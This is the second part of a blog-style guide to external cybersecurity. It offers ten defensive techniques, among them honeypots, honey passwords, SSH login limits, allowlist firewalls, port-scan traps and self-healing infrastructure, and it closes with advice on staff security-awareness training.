In the first part of this guide, we covered the foundations of modern cybersecurity: Zero Trust principles, access control, network segmentation, monitoring, backups, MFA, and other measures that help reduce the attack surface and make unauthorized access significantly more difficult.
Unfortunately, cybersecurity is an endless race. Any system connected to a network can become a target, and given enough time, resources, or motivation, attackers will eventually find new ways to bypass existing defenses. That's why external cybersecurity is not only about preventing intrusions but also about building infrastructure that remains resilient when prevention alone is no longer enough.
In this second part, we'll look at ten practical techniques that can strengthen your external security posture, improve threat detection, slow down attackers, and reduce the impact of successful compromises. From honeypots and deception technologies to self-healing infrastructure, account lifecycle management, and security awareness programs, these are the kinds of measures that help security teams gain valuable time when it matters most.
If a system can't be hacked, someone probably just switched it off.
The joke is funny. The reality is less so.
If a device is connected to a network, it is vulnerable. Sooner or later, every defensive technology is challenged by an offensive one. External cybersecurity is not just about preventing intrusion attempts; it is also about building an architecture that minimizes risk when attacks inevitably happen.
10 Practical Ways to Improve External Cybersecurity
1. Use Honeypots
The idea: Deploy a decoy server within your network that looks legitimate but is specifically designed to attract, monitor, and analyze attacks. This helps identify malicious actors, understand their techniques, and improve protection for your actual infrastructure.
In practice: Use open-source solutions such as Cowrie or Dionaea to deploy a honeypot that attracts attackers, records their activity, and alerts administrators when suspicious behavior is detected.
2. Notifications for Critical Events
The idea: While email alerts are common, some events—such as failed login attempts or configuration changes—may require immediate attention.
In practice: Configure SMS and/or messenger notifications (for example, Telegram) using tools such as Zabbix or Nagios so that critical incidents don't go unnoticed. For particularly sensitive systems, automated phone calls can even be used as an alerting mechanism.
3. Let Attackers Get Stuck in Honey Passwords
The idea: Create "honey passwords"—intentionally weak passwords assigned to accounts that appear important but have no access to critical resources. It's not a silver bullet, but every extra layer helps.
In practice: Monitor these accounts closely. If one of them is ever used, you'll immediately know that someone is attempting unauthorized access. This can be implemented through authentication logging and automated alerts whenever these credentials are used.
4. Use Native File System Analysis Tools
The idea: Many system administrators prefer using built-in operating system tools for managing and analyzing file systems, such as lsof (List of Open Files).
In practice: The lsof utility allows you to track which processes are using specific files or network ports. This makes it easier to identify suspicious activity or attempts to gain unauthorized access to data.
5. Introduce Delays for SSH Login Attempts
The idea: Slow down the SSH authentication process to make brute-force attacks less effective.
In practice: Use the MaxAuthTries and LoginGraceTime parameters in your sshd_config configuration to limit login attempts and introduce delays between them. This significantly increases the effort required for attackers trying to guess passwords through brute force.
6. Build an "Invisible" Firewall
The idea: Create firewall rules that allow connections only from "invisible" IP addresses known exclusively to administrators.
In practice: Use Linux tools such as iptables or firewalld to configure access rules that permit connections only from specific IP addresses that are not publicly documented or exposed in configuration files.
7. Automatically Remove or Disable Inactive Accounts
The idea: Automatically disable or remove accounts that have not been used for a certain period of time. This reduces the risk associated with forgotten, abandoned, or outdated accounts becoming an attack vector.
In practice: Create scripts that regularly check the date of the last login and disable or remove accounts that have remained inactive beyond a predefined threshold.
On Linux systems, Bash scripts can be used to automate account management. These scripts can check the /var/log/lastlog file or use the lastlog command to determine when a user last logged in and deactivate accounts that have been inactive for a specified period.
8. Use Self-Healing Systems
Expert note: This approach is primarily aimed at improving infrastructure availability and resilience. It does not directly enhance cybersecurity, but it can significantly reduce the impact of attacks and other operational issues.
The idea: Implement automated mechanisms that restore services and configurations when failures occur. Kubernetes is built around this principle. If a node fails, workloads are automatically moved to healthy nodes within the cluster. A pod is a container, or a group of containers, running together on the same host and sharing resources such as networking and storage.
In practice: Use tools such as Consul together with HashiCorp Nomad to automatically recover from failures or restart services when issues are detected. This reduces downtime and minimizes the need for manual intervention.
9. Obfuscate Host and Service Names
The idea: Obfuscation means making something less obvious, more confusing, or harder to interpret. The goal is to make it more difficult for attackers to understand a server's purpose by using non-obvious hostnames and service names. Obfuscation is one of the practices associated with the "security through obscurity" principle—a concept that is often discussed with a certain degree of irony, but can still have practical value when used appropriately.
In practice: Instead of naming servers something obvious like webserver01, use random or themed names that make identification more difficult during reconnaissance and scanning. Names such as Zephyr-XR2, Astral-Q5R, Delta-Sigma-42, or Krypton-5Z1 reveal very little about their actual function. Just make sure you leave proper documentation for the next administrator :)
10. Port Scanner Traps
The idea: Create fake ports and services that appear to be legitimate and accessible. These services perform no useful function, but they can distract, confuse, and slow down attackers.
In practice: Using tools such as Portspoof, you can configure a system so that port scans return a large number of apparently open ports and services that do not actually exist. Think of it as the painted tunnel from a classic cartoon. The attacker sees what looks like a valid path forward, but it's an illusion.
This creates a misleading picture of your network structure and potential vulnerabilities. An attacker who discovers these fake services may spend a significant amount of time investigating targets that lead nowhere. At the very least, this diverts attention away from real services that may contain exploitable weaknesses.
If the attacker attempts to interact with these decoys, you can log their activity and gain early visibility into reconnaissance efforts or intrusion attempts. The key is not to become overly distracted by script kiddies and automated scanners while doing so :)
You can also use Kippo (originally inspired by Kojoney), an SSH honeypot designed to capture the actions of attackers attempting unauthorized SSH access. A more modern alternative is Cowrie, which can actively interact with attackers and collect additional intelligence about their techniques and behavior.
Knowledge Is Power. Ignorance Is Downtime.
Cybersecurity awareness and employee education should never be treated as a one-time initiative. They need to become a permanent part of the organization's routine.
A real-world example: during the first phishing simulation, roughly 50% of employees fell for the attack. A year later, after mandatory training, that figure dropped to 13%. Six months later—after repeatedly explaining that clicking suspicious links out of curiosity is not a great career move—the success rate of the phishing campaign dropped to 0%.
Here's how to make security awareness part of everyday operations:
Conduct regular training sessions and workshops to improve employees' cybersecurity knowledge. Cover information security fundamentals, current threats, phishing detection, social engineering attacks, and practical defensive measures. Everyone should participate—from finance staff to facilities management.
Explain what phishing, malware, ransomware, DDoS attacks, zero-day vulnerabilities, and social engineering are. Teach practical mitigation techniques: maintaining up-to-date antivirus signatures, keeping software patched, verifying identities when communicating with unfamiliar contacts, using spam filters, filtering network traffic, and identifying malicious emails and links. Naturally, the level of technical detail should differ between accountants and system administrators.
Run regular exercises that simulate real cyberattacks, phishing campaigns, or social engineering attempts so employees can practice their skills in realistic scenarios.
Review the results, analyze mistakes, and identify weak points. Be objective when evaluating outcomes. Improvement rarely happens overnight, but consistent effort produces measurable results.
Invest in your people. One day, good cyber hygiene may be the thing that saves your business.
Final Thoughts
Implementing cybersecurity controls—especially those aimed at mitigating insider threats—can easily make employees' lives more difficult. That's why every security measure should be evaluated carefully. Solving one problem should not create a larger one somewhere else.
Looking at the state of the world today, investing in cybersecurity is no longer optional. What we've covered in this article is only the tip of the iceberg. The field is enormous, but every organization has to start somewhere.
If your budget and business requirements allow it, you should be working toward continuous software updates through Continuous Integration (CI) and Continuous Delivery (CD) practices, deploying standby servers or even secondary data centers, building geographically distributed clusters, integrating DevSecOps methodologies, and strengthening internal security controls. Physical access control systems, clean desk policies, and even the positioning of office monitors away from public walkways all play a role in protecting information.
Put simply, cybersecurity is a constantly evolving discipline. It requires continuous learning, continuous improvement, and constant adaptation. Stay informed about emerging threats and adjust your security strategy to match the realities of today's threat landscape.
Cybersecurity is one of those topics where everyone has a different story, a different lesson learned, or a different scar from a past incident.
Have you used any of these techniques in production? Did they actually help? Or maybe you have a few tricks of your own that didn't make it into this article?
Share your experience in the comments and feel free to ask questions. The best ideas often come from comparing notes with people who have already stepped on the same rake.
And if you'd like to catch future articles without relying on luck and search engines, follow us on LinkedIn. We'll keep exploring infrastructure, cybersecurity, and the occasional way to make life slightly harder for attackers.
Content:
